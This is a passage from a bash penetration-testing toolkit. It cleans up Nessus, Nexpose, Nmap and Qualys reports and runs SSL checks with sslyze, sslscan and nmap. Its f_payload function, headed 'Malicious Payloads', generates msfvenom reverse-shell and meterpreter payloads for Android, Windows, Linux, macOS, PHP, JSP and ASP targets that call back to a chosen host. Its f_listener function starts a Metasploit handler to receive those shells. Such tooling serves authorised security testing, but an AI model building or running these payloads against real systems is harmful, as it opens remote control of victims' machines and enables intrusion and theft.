Detection|McAfee Common Management Agent Detection|McAfee Common Management Agent Installation Detection|McAfee ePolicy Orchestrator Application Server Detection|MediaWiki Detection|Microsoft Exchange Installed|Microsoft Internet Explorer Enhanced Security Configuration Detection|Microsoft Internet Explorer Version Detection|Microsoft Lync Server Installed|Microsoft Malicious Software Removal Tool Installed|Microsoft .NET Framework Detection|Microsoft .NET Handlers Enumeration|Microsoft Office Detection|Microsoft OneNote Detection|Microsoft Patch Bulletin Feasibility Check|Microsoft Revoked Digital Certificates Enumeration|Microsoft Silverlight Detection|Microsoft Silverlight Installed \(Mac OS X\)|Microsoft SQL Server STARTTLS Support|Microsoft SMS\/SCCM Installed|Microsoft System Center Configuration Manager Client Installed|Microsoft System Center Operations Manager Component Installed|Microsoft Update Installed|Microsoft Windows AutoRuns Boot Execute|Microsoft Windows AutoRuns Codecs|Microsoft Windows AutoRuns Explorer|Microsoft Windows AutoRuns Internet Explorer|Microsoft Windows AutoRuns Known DLLs|Microsoft Windows AutoRuns Logon|Microsoft Windows AutoRuns LSA Providers|Microsoft Windows AutoRuns Network Providers|Microsoft Windows AutoRuns Print Monitor|Microsoft Windows AutoRuns Registry Hijack Possible Locations|Microsoft Windows AutoRuns Report|Microsoft Windows AutoRuns Scheduled Tasks|Microsoft Windows AutoRuns Services and Drivers|Microsoft Windows AutoRuns Unique Entries|Microsoft Windows AutoRuns Winlogon|Microsoft Windows AutoRuns Winsock Provider|Microsoft Windows 'CWDIllegalInDllSearch' Registry Setting|Microsoft Windows Installed Hotfixes|Microsoft Windows NTLMSSP Authentication Request Remote Network Name Disclosure|Microsoft Windows Process Module Information|Microsoft Windows Process Unique Process Name|Microsoft Windows Remote Listeners Enumeration \(WMI\)|Microsoft Windows SMB : Obtains the Password Policy|Microsoft Windows SMB LanMan Pipe 
Server Listing Disclosure|Microsoft Windows SMB Log In Possible|Microsoft Windows SMB LsaQueryInformationPolicy Function NULL Session Domain SID Enumeration|Microsoft Windows SMB NativeLanManager Remote System Information Disclosure|Microsoft Windows SMB Registry : Enumerate the list of SNMP communities|Microsoft Windows SMB Registry : Nessus Cannot Access the Windows Registry|Microsoft Windows SMB Registry : OS Version and Processor Architecture|Microsoft Windows SMB Registry : Remote PDC\/BDC Detection|Microsoft Windows SMB Versions Supported|Microsoft Windows SMB Registry : Vista \/ Server 2008 Service Pack Detection|Microsoft Windows SMB Registry : XP Service Pack Detection|Microsoft Windows SMB Registry Remotely Accessible|Microsoft Windows SMB Registry : Win 7 \/ Server 2008 R2 Service Pack Detection|Microsoft Windows SMB Registry : Windows 2000 Service Pack Detection|Microsoft Windows SMB Registry : Windows 2003 Server Service Pack Detection|Microsoft Windows SMB Service Detection|Microsoft Windows Update Installed|MobileIron API Settings|MSRPC Service Detection|Modem Enumeration \(WMI\)|MongoDB Settings|Mozilla Foundation Application Detection|MySQL Server Detection|Nessus Internal: Put cgibin in the KB|Nessus Scan Information|Nessus SNMP Scanner|NetBIOS Multiple IP Address Enumeration|Netstat Active Connections|Netstat Connection Information|netstat portscanner \(SSH\)|Netstat Portscanner \(WMI\)|Network Interfaces Enumeration \(WMI\)|Network Time Protocol \(NTP\) Server Detection|Nmap \(XML file importer\)|Non-compliant Strict Transport Security (STS)|OpenSSL Detection|OpenSSL Version Detection|Oracle Application Express \(Apex\) Detection|Oracle Application Express \(Apex\) Version Detection|Oracle Java Runtime Environment \(JRE\) Detection \(Unix\)|Oracle Java Runtime Environment \(JRE\) Detection|Oracle Installed Software Enumeration \(Windows\)|Oracle Settings|OS Identification|Palo Alto Networks PAN-OS Settings|Patch Management: Dell KACE K1000 
Settings|Patch Management: IBM Tivoli Endpoint Manager Server Settings|Patch Management: Patch Schedule From Red Hat Satellite Server|Patch Management: Red Hat Satellite Server Get Installed Packages|Patch Management: Red Hat Satellite Server Get Managed Servers|Patch Management: Red Hat Satellite Server Get System Information|Patch Management: Red Hat Satellite Server Settings|Patch Management: SCCM Server Settings|Patch Management: Symantec Altiris Settings|Patch Management: VMware Go Server Settings|Patch Management: WSUS Server Settings|PCI DSS compliance : options settings|PHP Version|Ping the remote host|POP3 Service STLS Command Support|Port scanner dependency|Port scanners settings|Post-Scan Rules Application|Post-Scan Status|Protected Web Page Detection|RADIUS Server Detection|RDP Screenshot|RealPlayer Detection|Record Route|Remote listeners enumeration \(Linux \/ AIX\)|Remote web server screenshot|Reputation of Windows Executables: Known Process\(es\)|Reputation of Windows Executables: Unknown Process\(es\)|RHEV Settings|RIP Detection|RMI Registry Detection|RPC portmapper \(TCP\)|RPC portmapper Service Detection|RPC Services Enumeration|Salesforce.com Settings|Samba Server Detection|SAP Dynamic Information and Action Gateway Detection|SAProuter Detection|Service Detection \(GET request\)|Service Detection \(HELP Request\)|slident \/ fake identd Detection|Service Detection \(2nd Pass\)|Service Detection: 3 ASCII Digit Code Responses|SMB : Disable the C$ and ADMIN$ shares after the scan (WMI)|SMB : Enable the C$ and ADMIN$ shares during the scan \(WMI\)|SMB Registry : Start the Registry Service during the scan|SMB Registry : Start the Registry Service during the scan \(WMI\)|SMB Registry : Starting the Registry Service during the scan failed|SMB Registry : Stop the Registry Service after the scan|SMB Registry : Stop the Registry Service after the scan \(WMI\)|SMB Registry : Stopping the Registry Service after the scan failed|SMB QuickFixEngineering \(QFE\) 
Enumeration|SMB Scope|SMTP Server Connection Check|SMTP Service STARTTLS Command Support|SMTP settings|smtpscan SMTP Fingerprinting|Snagit Installed|SNMP settings|SNMP Supported Protocols Detection|SNMPc Management Server Detection|SOCKS Server Detection|SolarWinds TFTP Server Installed|Spybot Search & Destroy Detection|SquirrelMail Detection|SSH Algorithms and Languages Supported|SSH Protocol Versions Supported|SSH Server Type and Version Information|SSH settings|SSL \/ TLS Versions Supported|SSL Certificate Information|SSL Cipher Block Chaining Cipher Suites Supported|SSL Cipher Suites Supported|SSL Compression Methods Supported|SSL Perfect Forward Secrecy Cipher Suites Supported|SSL Resume With Different Cipher Issue|SSL Service Requests Client Certificate|SSL Session Resume Supported|SSL\/TLS Service Requires Client Certificate|Strict Transport Security \(STS\) Detection|Subversion Client/Server Detection \(Windows\)|Symantec Backup Exec Server \/ System Recovery Installed|Symantec Encryption Desktop Installed|Symantec Endpoint Protection Manager Installed \(credentialed check\)|Symantec Veritas Enterprise Administrator Service \(vxsvc\) Detection|TCP\/IP Timestamps Supported|TeamViewer Version Detection|Tenable Appliance Check \(deprecated\)|Terminal Services Use SSL\/TLS|Thunderbird Installed \(Mac OS X\)|Time of Last System Startup|TLS Next Protocols Supported|TLS NPN Supported Protocol Enumeration|Traceroute Information|Unknown Service Detection: Banner Retrieval|UPnP Client Detection|VERITAS Backup Agent Detection|VERITAS NetBackup Agent Detection|Viscosity VPN Client Detection \(Mac OS X\)|VMware vCenter Detect|VMware vCenter Orchestrator Installed|VMware ESX\/GSX Server detection|VMware SOAP API Settings|VMware vCenter SOAP API Settings|VMware Virtual Machine Detection|VMware vSphere Client Installed|VMware vSphere Detect|VNC Server Security Type Detection|VNC Server Unencrypted Communication Detection|vsftpd Detection|Wake-on-LAN|Web Application 
Firewall Detection|Web Application Tests Settings|Web mirroring|Web Server Directory Enumeration|Web Server Harvested Email Addresses|Web Server HTTP Header Internal IP Disclosure|Web Server Load Balancer Detection|Web Server No 404 Error Code Check|Web Server robots.txt Information Disclosure|Web Server UDDI Detection|Window Process Information|Window Process Module Information|Window Process Unique Process Name|Windows Compliance Checks|Windows ComputerSystemProduct Enumeration \(WMI\)|Windows Display Driver Enumeration|Windows DNS Server Enumeration|Windows Management Instrumentation \(WMI\) Available|Windows NetBIOS \/ SMB Remote Host Information Disclosure|Windows Prefetch Folder|Windows Product Key Retrieval|WinSCP Installed|Wireless Access Point Detection|Wireshark \/ Ethereal Detection \(Windows\)|WinZip Installed|WMI Anti-spyware Enumeration|WMI Antivirus Enumeration|WMI Bluetooth Network Adapter Enumeration|WMI Encryptable Volume Enumeration|WMI Firewall Enumeration|WMI QuickFixEngineering \(QFE\) Enumeration|WMI Server Feature Enumeration|WMI Trusted Platform Module Enumeration|Yosemite Backup Service Driver Detection|ZENworks Remote Management Agent Detection)" nessus.csv > tmp.csv
# Delete additional findings with CVSS score of 0
egrep -v "(Acronis Agent Detection \(TCP\)|Acronis Agent Detection \(UDP\)|Additional DNS Hostnames|Adobe AIR Detection|Adobe Reader Enabled in Browser \(Internet Explorer\)|Adobe Reader Enabled in Browser \(Mozilla firefox\)|Alert Standard Format \/ Remote Management and Control Protocol Detection|Amazon Web Services Settings|Apache Banner Linux Distribution Disclosure|Apache Tomcat Default Error Page Version Detection|Apple TV Detection|Apple TV Version Detection|Authentication Failure - Local Checks Not Run|CA ARCServe UniversalAgent Detection|CA BrightStor ARCserve Backup Discovery Service Detection|Citrix Licensing Service Detection|Citrix Server Detection|COM+ Internet Services \(CIS\) Server Detection|Crystal Reports Central Management Server Detection|Data Execution Prevention \(DEP\) is Disabled|Daytime Service Detection|DB2 Connection Port Detection|Discard Service Detection|DNS Server BIND version Directive Remote Version Disclosure|DNS Server Detection|DNS Server hostname.bind Map Hostname Disclosure|Do not scan Novell NetWare|Do not scan printers|Do not scan printers \(AppSocket\)|Dropbox Installed \(Mac OS X\)|Dropbox Software Detection \(uncredentialed check\)|Enumerate IPv4 Interfaces via SSH|Echo Service Detection|EMC Replication Manager Client Detection|Enumerate IPv6 Interfaces via SSH|Enumerate MAC Addresses via SSH|Exclude top-level domain wildcard hosts|H323 Protocol \/ VoIP Application Detection|Host Authentication Failure\(s\) for Provided Credentials|HP LoadRunner Agent Service Detection|HP Integrated Lights-Out \(iLO\) Detection|IBM Tivoli Storage Manager Client Acceptor Daemon Detection|IBM WebSphere MQ Listener Detection|ICMP Timestamp Request Remote Date Disclosure|Identd Service Detection|Inconsistent Hostname and IP Address|Ingres Communications Server Detection|Internet Cache Protocol \(ICP\) Version 2 Detection|IPSEC Internet Key Exchange \(IKE\) Detection|IPSEC Internet Key Exchange \(IKE\) Version 1 Detection|iTunes Music Sharing 
Enabled|iTunes Version Detection \(Mac OS X\)|JavaScript Enabled in Adobe Reader|IPSEC Internet Key Exchange \(IKE\) Version 2 Detection|iSCSI Target Detection|LANDesk Ping Discovery Service Detection|Link-Local Multicast Name Resolution \(LLMNR\) Detection|LPD Detection|mDNS Detection \(Local Network\)|Microsoft IIS 404 Response Service Pack Signature|Microsoft SharePoint Server Detection|Microsoft SQL Server Detection \(credentialed check\)|Microsoft SQL Server TCP\/IP Listener Detection|Microsoft SQL Server UDP Query Remote Version Disclosure|Microsoft Windows Installed Software Enumeration \(credentialed check\)|Microsoft Windows Messenger Detection|Microsoft Windows Mounted Devices|Microsoft Windows Security Center Settings|Microsoft Windows SMB Fully Accessible Registry Detection|Microsoft Windows SMB LsaQueryInformationPolicy Function SID Enumeration|Microsoft Windows SMB Registry Not Fully Accessible Detection|Microsoft Windows SMB Share Hosting Possibly Copyrighted Material|Microsoft Windows SMB : WSUS Client Configured|Microsoft Windows Startup Software Enumeration|Microsoft Windows Summary of Missing Patches|NIS Server Detection|Nessus SYN scanner|Nessus TCP scanner|Nessus UDP scanner|Nessus Windows Scan Not Performed with Admin Privileges|Netscape Enterprise Server Default Files Present|NetVault Process Manager Service Detection|NFS Server Superfluous|News Server \(NNTP\) Information Disclosure|NNTP Authentication Methods|OEJP Daemon Detection|Open Port Re-check|OpenVAS Manager \/ Administrator Detection|Oracle Database Detection|Oracle Database tnslsnr Service Remote Version Disclosure|Oracle Java JRE Enabled \(Google Chrome\)|Oracle Java JRE Enabled \(Internet Explorer\)|Oracle Java JRE Enabled \(Mozilla firefox\)|Oracle Java JRE Premier Support and Extended Support Version Detection|Oracle Java JRE Universally Enabled|Panda AdminSecure Communications Agent Detection|Patch Report|PCI DSS compliance : Insecure Communication Has Been Detected|Pervasive 
PSQL \/ Btrieve Server Detection|OSSIM Server Detection|POP Server Detection|PostgreSQL Server Detection|PPTP Detection|QuickTime for Windows Detection|Quote of the Day \(QOTD\) Service Detection|Reverse NAT\/Intercepting Proxy Detection|RMI Remote Object Detection|RPC rstatd Service Detection|rsync Service Detection|RTMP Server Detection|RTSP Server Type \/ Version Detection|Session Initiation Protocol Detection|SFTP Supported|Skype Detection|Skype for Mac Installed \(credentialed check\)|Skype Stack Version Detection|SLP Server Detection \(TCP\)|SLP Server Detection \(UDP\)|SMTP Authentication Methods|SMTP Server Detection|SNMP Protocol Version Detection|SNMP Query Installed Software Disclosure|SNMP Query Routing Information Disclosure|SNMP Query Running Process List Disclosure|SNMP Query System Information Disclosure|SNMP Request Network Interfaces Enumeration|Software Enumeration \(SSH\)|SSL Root Certification Authority Certificate Information|SSL Certificate Chain Contains Certificates Expiring Soon|SSL Certificate Chain Contains RSA Keys Less Than 2048 bits|SSL Certificate Chain Contains Unnecessary Certificates|SSL Certificate Chain Not Sorted|SSL Certificate 'commonName' Mismatch|SSL Certificate Expiry - Future Expiry|SuperServer Detection|Symantec pcAnywhere Detection \(TCP\)|Symantec pcAnywhere Status Service Detection \(UDP\)|TCP Channel Detection|Telnet Server Detection|TFTP Daemon Detection|Universal Plug and Play \(UPnP\) Protocol Detection|Unix Operating System on Extended Support|USB Drives Enumeration \(WMI\)|VMware Fusion Version Detection \(Mac OS X\)|WebDAV Detection|Web Server \/ Application favicon.ico Vendor Fingerprinting|Web Server Crafted Request Vendor/Version Information Disclosure|Web Server on Extended Support|Web Server SSL Port HTTP Traffic Detection|Web Server Unconfigured - Default Install Page Present|Web Server UPnP Detection|Windows Terminal Services Enabled|WINS Server Detection|X Font Service Detection)" tmp.csv > tmp2.csv
# Delete additional findings.
egrep -v '(DHCP Server Detection|mDNS Detection \(Remote Network\))' tmp2.csv > tmp3.csv
# Clean up
cat tmp3.csv | sed 's/Algorithm :/Algorithm:/g; s/are :/are:/g; s/authorities :/authorities:/g; s/authority :/authority:/g; s/Banner :/Banner:/g; s/ (banner check)//; s/before :/before/g; s/combinations :/combinations:/g; s/ (credentialed check)//; s/expired :/expired:/g; s/Here is the list of medium strength SSL ciphers supported by the remote server: Medium Strength Ciphers //g; s/httpOnly/HttpOnly/g; s/ (intrusive check)//g; s/is :/is:/g; s/P /P /g; s/Issuer :/Issuer:/g; s/Issuer :/Issuer:/g; s/List of 64-bit block cipher suites supported by the remote server: Medium Strength Ciphers //g; s/Nessus collected the following banner from the remote Telnet server: //g; s/ (remote check)//; s/ (safe check)//; s/server :/server:/g; s/Service Pack /SP/g; s/Source :/Source:/g; s/source :/source:/g; s/Subject :/Subject:/g; s/Subject :/Subject:/g; s/supported :/supported:/g; s/The following certificate was at the top of the certificate chain sent by the remote host, but it is signed by an unknown certificate authority: |-//g; s/The following certificate was found at the top of the certificate chain sent by the remote host, but is self-signed and was not found in the list of known certificate authorities: |-//g; s/The following certificate was part of the certificate chain sent by the remote host, but it has expired : |-//g; s/The following certificates were part of the certificate chain sent by the remote host, but they have expired : |-//g; s/The following certificates were part of the certificate chain sent by the remote host, but contain hashes that are considered to be weak. |-//g; s/The identities known by Nessus are: //g; s/ (uncredentialed check)//g; s/ (version check)//g; s/()//g; s/(un)//g; s/users :/users:/g; s/version :/version:/g; s/version :/version:/g; s/version :/version:/g; s/version :/version:/g; s/ :/:/g; s/: /: /g; s/: /: /g; s/" /"/g; s/" /"/g; s/" /"/g; s/"h/" h/g; s/. /. /g' > $home/data/nessus-`date +%H:%M:%S`.csv
rm nessus* tmp*
echo
echo $medium
echo
echo -e "The new report is located at ${YELLOW}$home/data/nessus-`date +%H:%M:%S`.csv${NC}\n"
echo
echo
exit
;;
# Nexpose XML 2.0 export.
3)
f_location
parsers/parse-nexpose.py $location
mv nexpose.csv $home/data/nexpose-`date +%H:%M:%S`.csv
echo
echo $medium
echo
echo -e "The new report is located at ${YELLOW}$home/data/nexpose-`date +%H:%M:%S`.csv${NC}\n"
echo
echo
exit
;;
# Nmap XML. parse-nmap.py expects its input to be named nmap.xml in the cwd,
# hence the copy in and removal afterwards.
4)
f_location
cp $location ./nmap.xml
parsers/parse-nmap.py
mv nmap.csv $home/data/nmap-`date +%H:%M:%S`.csv
rm nmap.xml
echo
echo $medium
echo
echo -e "The new report is located at ${YELLOW}$home/data/nmap-`date +%H:%M:%S`.csv${NC}\n"
echo
echo
exit
;;
# Qualys export.
5)
f_location
echo
echo "[!] This will take about 2.5 mins, be patient."
echo
parsers/parse-qualys.py $location
mv qualys.csv $home/data/qualys-`date +%H:%M:%S`.csv
echo
echo $medium
echo
echo -e "The new report is located at ${YELLOW}$home/data/qualys-`date +%H:%M:%S`.csv${NC}\n"
echo
echo
exit
;;
6) f_main;;
*) f_error;;
esac
}
##############################################################################################################
f_ssl(){
clear
f_banner
echo -e "${BLUE}Check for SSL certificate issues.${NC}"
echo
echo "List of IP:port."
echo
f_location
echo
echo $medium
echo
echo "Running sslyze."
sslyze --targets_in=$location --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers > tmp
# Remove the first 20 lines and cleanup
sed '1,20d' tmp | egrep -v '(=>|error:|ERROR|is trusted|NOT SUPPORTED|OK - Supported|OpenSSLError|Server rejected|timeout|unexpected error)' |
# Find FOO, if the next line is blank, delete both lines
awk '/Compression/ { Compression = 1; next } Compression == 1 && /^$/ { Compression = 0; next } { Compression = 0 } { print }' |
awk '/Renegotiation/ { Renegotiation = 1; next } Renegotiation == 1 && /^$/ { Renegotiation = 0; next } { Renegotiation = 0 } { print }' |
awk '/Resumption/ { Resumption = 1; next } Resumption == 1 && /^$/ { Resumption = 0; next } { Resumption = 0 } { print }' |
awk '/SSLV2/ { SSLV2 = 1; next } SSLV2 == 1 && /^$/ { SSLV2 = 0; next } { SSLV2 = 0 } { print }' |
awk '/SSLV3/ { SSLV3 = 1; next } SSLV3 == 1 && /^$/ { SSLV3 = 0; next } { SSLV3 = 0 } { print }' |
awk '/Stapling/ { Stapling = 1; next } Stapling == 1 && /^$/ { Stapling = 0; next } { Stapling = 0 } { print }' |
awk '/Unhandled/ { Unhandled = 1; next } Unhandled == 1 && /^$/ { Unhandled = 0; next } { Unhandled = 0 } { print }' |
# Find a dash (-), if the next line is blank, delete it
awk -v n=-2 'NR==n+1 && !NF{next} /-/ {n=NR}1' |
# Remove double spacing
cat -s > $home/data/sslyze.txt
echo
echo "Running sslscan."
echo
START=$(date +%r\ %Z)
echo > tmp
echo $medium >> tmp
echo >> tmp
number=$(wc -l $location | cut -d ' ' -f1)
N=0
while read -r line; do
echo $line > ssl_$line
N=$((N+1))
echo -n "[$N/$number] $line"
sslscan --ipv4 --show-certificate --ssl2 --ssl3 --tlsall --no-colour $line > tmp_$line
echo "... completed."
echo >> ssl_$line
if [ -e tmp_$line ]; then
error=$(grep 'ERROR:' tmp_$line)
if [[ ! $error ]]; then
issuer=$(grep 'Issuer: ' tmp_$line)
if [[ $issuer ]]; then
grep 'Issuer:' tmp_$line | sed 's/ Issuer: / Issuer: /g' >> ssl_$line
else
echo "Issuer info not available." >> ssl_$line
echo >> ssl_$line
fi
subject=$(grep 'Subject:' tmp_$line)
if [[ $subject ]]; then
grep 'Subject:' tmp_$line >> ssl_$line
echo >> ssl_$line
else
echo "Certificate subject info not available." >> ssl_$line
echo >> ssl_$line
fi
dns=$(grep 'DNS:' tmp_$line)
if [[ $dns ]]; then
grep 'DNS:' tmp_$line | sed 's/ DNS:/ DNS:/g' >> ssl_$line
echo >> ssl_$line
fi
A=$(grep -i 'MD5WithRSAEncryption' tmp_$line)
if [[ $A ]]; then
echo "[*] MD5-based Signature in TLS/SSL Server X.509 Certificate" >> ssl_$line
grep -i 'MD5WithRSAEncryption' tmp_$line >> ssl_$line
echo >> ssl_$line
fi
B=$(grep 'NULL' tmp_$line)
if [[ $B ]]; then
echo "[*] NULL Ciphers" >> ssl_$line
grep 'NULL' tmp_$line >> ssl_$line
echo >> ssl_$line
fi
C=$(grep 'SSLv2' tmp_$line)
if [[ $C ]]; then
echo "[*] TLS/SSL Server Supports SSLv2" >> ssl_$line
grep 'SSLv2' tmp_$line > ssltmp2_$line
sed '/^ SSL/d' ssltmp2_$line >> ssl_$line
echo >> ssl_$line
fi
D=$(grep ' 40 bits' tmp_$line)
D2=$(grep ' 56 bits' tmp_$line)
if [[ $D || $D2 ]]; then
echo "[*] TLS/SSL Server Supports Weak Cipher Algorithms" >> ssl_$line
grep ' 40 bits' tmp_$line >> ssl_$line
grep ' 56 bits' tmp_$line >> ssl_$line
echo >> ssl_$line
fi
expmonth=$(grep 'Not valid after:' tmp_$line | awk '{print $4}')
if [ "$expmonth" == "Jan" ]; then monthnum="01"; fi
if [ "$expmonth" == "Feb" ]; then monthnum="02"; fi
if [ "$expmonth" == "Mar" ]; then monthnum="03"; fi
if [ "$expmonth" == "Apr" ]; then monthnum="04"; fi
if [ "$expmonth" == "May" ]; then monthnum="05"; fi
if [ "$expmonth" == "Jun" ]; then monthnum="06"; fi
if [ "$expmonth" == "Jul" ]; then monthnum="07"; fi
if [ "$expmonth" == "Aug" ]; then monthnum="08"; fi
if [ "$expmonth" == "Sep" ]; then monthnum="09"; fi
if [ "$expmonth" == "Oct" ]; then monthnum="10"; fi
if [ "$expmonth" == "Nov" ]; then monthnum="11"; fi
if [ "$expmonth" == "Dec" ]; then monthnum="12"; fi
expyear=$(grep 'Not valid after:' tmp_$line | awk '{print $7}')
expday=$(grep 'Not valid after:' tmp_$line | awk '{print $5}')
expdate=$(echo $expyear-$monthnum-$expday)
datenow=$(date +%F)
date2stamp(){
date --utc --date "$1" +%s
}
datenowstamp=$(date2stamp $datenow)
expdatestamp=$(date2stamp $expdate)
certissuedate=$(grep 'Not valid before:' tmp_$line)
fmt_certissuedate=$(echo $certissuedate | sed 's/Not valid before:/Certificate Issue Date:/')
certexpiredate=$(grep 'Not valid after:' tmp_$line)
fmt_certexpiredate=$(echo $certexpiredate | sed 's/Not valid after:/Certificate Expiry Date:/')
echo " $fmt_certissuedate" >> ssl_$line
echo " $fmt_certexpiredate" >> ssl_$line
echo >> ssl_$line
if (($expdatestamp < $datenowstamp)); then
echo "[*] X.509 Server Certificate is Invalid/Expired" >> ssl_$line
echo " Cert Expire Date: $expdate" >> ssl_$line
echo >> ssl_$line
fi
E=$(grep 'Authority Information Access' tmp_$line)
if [[ ! $E ]]; then
echo "[*] Self-signed TLS/SSL Certificate" >> ssl_$line
echo >> ssl_$line
fi
echo $medium >> ssl_$line
echo >> ssl_$line
cat ssl_$line >> tmp
else
echo -e "${RED}Could not open a connection.${NC}"
echo "[*] Could not open a connection." >> ssl_$line
echo >> ssl_$line
echo $medium >> ssl_$line
echo >> ssl_$line
cat ssl_$line >> tmp
fi
else
echo -e "${RED}No response.${NC}"
echo "[*] No response." >> ssl_$line
echo >> ssl_$line
echo $medium >> ssl_$line
echo >> ssl_$line
cat ssl_$line >> tmp
fi
done < "$location"
END=$(date +%r\ %Z)
echo "sslscan Report" > tmp2
date +%A" - "%B" "%d", "%Y >> tmp2
echo >> tmp2
echo "Start time $START" >> tmp2
echo "Finish time $END" >> tmp2
echo "Scanner IP $ip" >> tmp2
mv tmp2 $home/data/sslscan.txt
grep -v 'Issuer info not available.' tmp | grep -v 'Certificate subject info not available.' >> $home/data/sslscan.txt
# Nmap
echo
echo "Running nmap."
echo
cat $location | cut -d ':' -f1 > tmp
nmap -Pn -n -T4 --open -p443 --script=ssl* tls-ticketbleed -iL tmp > tmp2
egrep -v '( - A|before|Ciphersuite|cipher preference|deprecated)' tmp2 |
# Find FOO, if the next line is blank, delete both lines
awk '/latency/ { latency = 1; next } latency == 1 && /^$/ { latency = 0; next } { latency = 0 } { print }' |
# Find FOO, if the next line is blank, delete the line containing FOO
awk -v n=-2 'NR==n+1 && NF{print hold} /sslv2-drown/ {n=NR;hold=$0;next}1' |
awk -v n=-2 'NR==n+1 && NF{print hold} /least strength/ {n=NR;hold=$0;next}1' |
awk -v n=-2 'NR==n+1 {if($0 ~ /NULL/) { next; } else { print hold } } /compressors/ {n=NR;hold=$0;next}1' |
sed 's/Nmap scan report for //g' > $home/data/nmap-ssl.txt
rm tmp* ssl_* 2>/dev/null
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The new reports are located at ${YELLOW}$home/data/sslscan.txt, sslyze.txt, ${NC}and ${YELLOW}nmap-ssl.txt ${NC}"
echo
echo
exit
}
##############################################################################################################
f_payload(){
# Interactively build a reverse-shell payload with msfvenom ($msfv) and save
# it under $home/data/. Each menu choice sets: payload (-p), output file
# extension ("extention" [sic], kept for consistency with the rest of the
# file), output format (-f), architecture (-a) and platform (--platform).
clear
f_banner
echo -e "${BLUE}Malicious Payloads${NC}"
echo
echo "1. android/meterpreter/reverse_tcp"
echo "2. cmd/windows/reverse_powershell"
echo "3. java/jsp_shell_reverse_tcp"
echo "4. linux/x64/shell_reverse_tcp"
echo "5. linux/x86/meterpreter/reverse_tcp"
echo "6. osx/x64/shell_reverse_tcp"
echo "7. php/meterpreter/reverse_tcp"
echo "8. windows/meterpreter/reverse_tcp"
echo "9. windows/meterpreter/reverse_tcp (ASP)"
echo "10. windows/x64/meterpreter/reverse_tcp"
echo "11. Previous menu"
echo
echo -n "Choice: "
read choice
case $choice in
1) payload="android/meterpreter/reverse_tcp"
extention=".apk"
format="raw"
arch="dalvik"
platform="android";;
2) payload="cmd/windows/reverse_powershell"
extention=".bat"
format="raw"
arch="cmd"
platform="windows";;
3) payload="java/jsp_shell_reverse_tcp"
extention=".jsp"
format="raw"
arch="cmd"
platform="windows";;
4) payload="linux/x64/shell_reverse_tcp"
extention=""
format="elf"
arch="x64"
platform="linux";;
5) payload="linux/x86/meterpreter/reverse_tcp"
extention=""
format="elf"
arch="x86"
platform="linux";;
6) payload="osx/x64/shell_reverse_tcp"
extention=""
format="macho"
arch="x64"
platform="osx";;
7) payload="php/meterpreter/reverse_tcp"
extention=".php"
format="raw"
arch="php"
platform="php"
encoder="php/base64";;
# BUG FIX: the menu label is "windows/meterpreter/reverse_tcp (ASP)", but
# the payload string passed to msfvenom -p must not contain " (ASP)" --
# unquoted expansion made "(ASP)" a stray argument and the command failed.
# The .asp extension/format already distinguishes this option.
8) payload="windows/meterpreter/reverse_tcp"
extention=".exe"
format="exe"
arch="x86"
platform="windows";;
9) payload="windows/meterpreter/reverse_tcp"
extention=".asp"
format="asp"
arch="x86"
platform="windows";;
10) payload="windows/x64/meterpreter/reverse_tcp"
extention=".exe"
format="exe"
arch="x64"
platform="windows";;
11) f_main;;
*) f_error;;
esac
echo
echo -n "LHOST: "
read lhost
# Check for no answer - default to this host's IP ($ip).
if [[ -z $lhost ]]; then
lhost=$ip
echo "Using $ip"
echo
fi
echo -n "LPORT: "
read lport
# Check for valid port number.
if [[ $lport -lt 1 || $lport -gt 65535 ]]; then
f_error
fi
# PHP payloads get a generic file name; all others embed platform and arch.
if [[ $payload == "php/meterpreter/reverse_tcp" ]]; then
echo
$msfv -p $payload LHOST=$lhost LPORT=$lport -f $format -a $arch --platform $platform -o $home/data/payload$extention
else
echo
$msfv -p $payload LHOST=$lhost LPORT=$lport -f $format -a $arch --platform $platform -o $home/data/payload-$platform-$arch$extention
fi
echo
echo
exit
}
##############################################################################################################
f_listener(){
# Interactively start a Metasploit multi/handler for the chosen payload:
# fills the aaa/bbb/ccc placeholders in resource/listener.rc, makes sure
# postgresql is running, then launches msfconsole ($msf) on the rc file.
clear
f_banner
echo -e "${BLUE}Metasploit Listeners${NC}"
echo
echo "1. android/meterpreter/reverse_tcp"
echo "2. cmd/windows/reverse_powershell"
echo "3. java/jsp_shell_reverse_tcp"
echo "4. linux/x64/shell_reverse_tcp"
echo "5. linux/x86/meterpreter/reverse_tcp"
echo "6. osx/x64/shell_reverse_tcp"
echo "7. php/meterpreter/reverse_tcp"
echo "8. windows/meterpreter/reverse_tcp"
echo "9. windows/x64/meterpreter/reverse_tcp"
echo "10. Previous menu"
echo
echo -n "Choice: "
read choice
case $choice in
1) payload="android/meterpreter/reverse_tcp";;
2) payload="cmd/windows/reverse_powershell";;
3) payload="java/jsp_shell_reverse_tcp";;
4) payload="linux/x64/shell_reverse_tcp";;
5) payload="linux/x86/meterpreter/reverse_tcp";;
6) payload="osx/x64/shell_reverse_tcp";;
7) payload="php/meterpreter/reverse_tcp";;
8) payload="windows/meterpreter/reverse_tcp";;
9) payload="windows/x64/meterpreter/reverse_tcp";;
10) f_main;;
*) f_error;;
esac
echo
echo -n "LHOST: "
read lhost
# Check for no answer - default to this host's IP ($ip).
if [[ -z $lhost ]]; then
lhost=$ip
echo "Using $ip"
echo
fi
echo -n "LPORT: "
read lport
echo
# Check for valid port number.
if [[ $lport -lt 1 || $lport -gt 65535 ]]; then
f_error
fi
# Check for root when binding to a low port
if [[ $lport -lt 1025 && "$(id -u)" != "0" ]]; then
echo "You must be root to bind to a port that low."
sleep 3
f_error
fi
cp $discover/resource/listener.rc /tmp/
# Check for OS X - BSD sed requires an explicit (empty) backup suffix for -i.
# aaa uses | as the sed delimiter because the payload path contains slashes.
if [[ `uname` == 'Darwin' ]]; then
sed -i '' "s|aaa|$payload|g" /tmp/listener.rc
sed -i '' "s/bbb/$lhost/g" /tmp/listener.rc
sed -i '' "s/ccc/$lport/g" /tmp/listener.rc
else
sed -i "s|aaa|$payload|g" /tmp/listener.rc
sed -i "s/bbb/$lhost/g" /tmp/listener.rc
sed -i "s/ccc/$lport/g" /tmp/listener.rc
fi
# Start postgresql (used by Metasploit's database) if it is not running yet.
x=`ps aux | grep 'postgres' | grep -v 'grep'`
if [[ -z $x ]]; then
echo
service postgresql start
fi
$msf -r /tmp/listener.rc
echo
echo
exit
}
##############################################################################################################
f_updates(){
# Maintenance report: diff the tools installed on this system (nmap scripts,
# Metasploit auxiliary scanners, recon-ng modules) against the ones already
